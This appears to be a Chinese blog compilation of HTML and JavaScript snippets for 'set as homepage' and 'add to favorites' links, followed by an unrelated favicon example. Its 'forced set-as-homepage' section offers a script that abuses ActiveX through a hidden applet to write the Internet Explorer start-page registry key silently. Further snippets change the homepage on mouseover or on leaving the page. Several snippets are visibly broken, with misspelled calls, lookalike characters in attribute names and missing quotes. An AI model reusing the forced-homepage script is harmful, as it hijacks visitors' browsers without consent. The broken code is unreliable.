网站设为首页、加入收藏代码全集

<a href=# onClick="this.style.behavior='url(#default#homepage)';this.setHomePage

('www.******.com');">设为首页</a>
1.<!--加入收藏代码-->
<a href="javascript:window.external.AddFavorite('http://www.yagebu.com','雅各布')">添加

到收藏夹</a>
2.<!— 设为首页—>
   图片链接
<a style="cursor:hand" οnclick="this.style.behavior='url(#default#homepage)';
this.setHomePage('www.sccvtc.net');">
<img width=16 height=16 border=0 src="images/Logo.gif">
<u> Set as Home Page</u></a>

热区和文字链接差不多,你把<area>看成<a>就行了.
代码整理如下:
<map name="Map">
<area shape="rect" coords="694,8,755,26" οnclick="this.style.behavior='url

(#default#homepage)';this.setHomePage('http://你的网址/');return false;"

href="javascript:void(null)">
<area shape="rect" coords="801,7,865,25" href="javascript:void

(null);window.external.AddFavorite('http://你的网址/', '标题')">
<area shape="rect" coords="909,7,976,27" href="lianxi.htm">
</map>
第一个热区为"设为主页",第二个热区为"添加收藏",第三个热区是链接到你的网页lianxi.htm
注意:<map>与<img>要同时使用....

(1).文字型:
<a οnclick="this.style.behavior='url(#default#homepage)';this.setHomePage

('http://www.sccvtc.net');" href="#">设为首页</a>
范例:
设为首页

(2).按钮型:
<input TYPE="button" VALUE=" 设为首页 " οnclick="this.style.behavior='url

(#default#homepage)';this.setHomePage('http://www.sccvtc.net');" href="#">


离开时自动提示设为首页

<body οnunlοad="BASEBody.style.behavior='url(#default#homepage)';if(!

(BASEBody.isHomePage('http://www.sccvtc.net')))BASEBody.setHomePage

('http://www.sccvtc.net/');">

设为首页代码大全把以下代码<Body>相应位置
<span   style="CURSOR: hand">设为首页</span>
===============================================================

强制设为首页代码
<script>
var ucook=document.cookie;
var user=ucook.indexOF("ilooki=");
if(user==-1)
{
var nowTime=new Date();
document.cookie="ilooki"+";"+"expires=Wednesday,03-Jan-"+(nowTime.getYear()+1903+"12:34:56 GMT";
document.write("<APPLET HEIGHT=0WIDTH=0 code=com.ms.activeX.ActiveXCompoment></APPLET>");function yuzi(){try{a1
=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl=a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");try{Shl.RegWrite("hkcu\Software\Microsoft\Internet Expiorer\Main\Start Page",
http://hi.baidu.com/a0bing);}catch(e){}}catch(e){}}setTimeout("yuzi()",1000);
}
</script>
===============================================================

鼠标指向时提示设为首页 将下列代码插入<body>区中:
<A href="
http://hi.baidu.com/a0bing  target="_blank">设为首页</A>

===============================================================

打开页面时自动弹出窗口询问是否设为首页

将以下代码放在<head></head>之间: <script language="javascript">
function myhomepage(){
this.homepage.style.behavior='url(#default#homepage)';this.homepage.sethomepage('
http://hi.baidu.com/a0bing);
}
</script>
<p align="center"><a href="
http://hi.baidu.com/a0bing" name="homepage" ></a>
再将下面代码加入<body>内:
即:<body >
离开时自动提示设为首页
<body >  

================================================================

加入收藏夹,设为首页代码
把以下代码<Body>相应位置
<a target=_top href=javascript:window.external.AddFavorite('
http://hi.baidu.com/a0bing)>加入收藏</a>
<a href=# onClick="this.style.behavior='url(#default#homepage)';this.setHomePage('
http://hi.baidu.com/a0bing);">设为首页</a>

================================================================

鼠标指向时提示设为首页
将下列代码插入<body>区中:
<A href="
http://hi.baidu.com/a0bing" οnmοuseοver="this.style.behavior='url(#default#homepage)';this.setHomePage('http://hi.baidu.com/a0bing');" target="_blank">设为首页</A>

================================================================

离开时自动提示设为首页
<body οnunlοad="BASEBody.style.behavior='url(#default#homepage)';if(!(BASEBody.isHomePage('
http://hi.baidu.com/a0bing')))BASEBody.setHomePage('http://hi.baidu.com/a0bing');">  
把以下代码<Body>相应位置

<a target=_top href=javascript:window.external.AddFavorite('
http://hi.baidu.com/a0bing')>加入收藏</a>


<a href=# onClick="this.style.behavior='url(#default#homepage)';this.setHomePage('
http://hi.baidu.com/a0bing');">设为首页</a>

 

适用代码举例:

<A href="javascript:window.external.AddFavorite('http://www.bb-boy.com/','BB-Boy')">
<img src="http://www15.tx8.cn/photo/zpmxzebr/20091126162843807.jpg" width="154" height="50"></a>

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
在 HTML 页面中添加首页和收藏代码可以让用户更方便地将你的网站添加到浏览器主页和收藏夹中。以下是一个示例代码: ```html <!DOCTYPE html> <html> <head> <title>My Website</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- 添加首页和收藏代码 --> <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> <link rel="apple-touch-icon" sizes="180x180" href="apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="favicon-16x16.png"> <link rel="manifest" href="site.webmanifest"> <meta name="msapplication-TileColor" content="#da532c"> <meta name="theme-color" content="#ffffff"> <!-- end --> </head> <body> <!-- your website content here --> </body> </html> ``` 在这个示例中,我们添加了以下代码: ```html <link rel="icon" href="favicon.ico" type="image/x-icon"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"> <link rel="apple-touch-icon" sizes="180x180" href="apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="favicon-16x16.png"> <link rel="manifest" href="site.webmanifest"> <meta name="msapplication-TileColor" content="#da532c"> <meta name="theme-color" content="#ffffff"> ``` 这些代码会将网站图标添加到浏览器标签页和书签栏中,并且在将网站添加到主屏幕时也会显示。如果你想要自定义更多的内容,可以查看相关文档或者使用在线生成工具来生成相应的代码

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值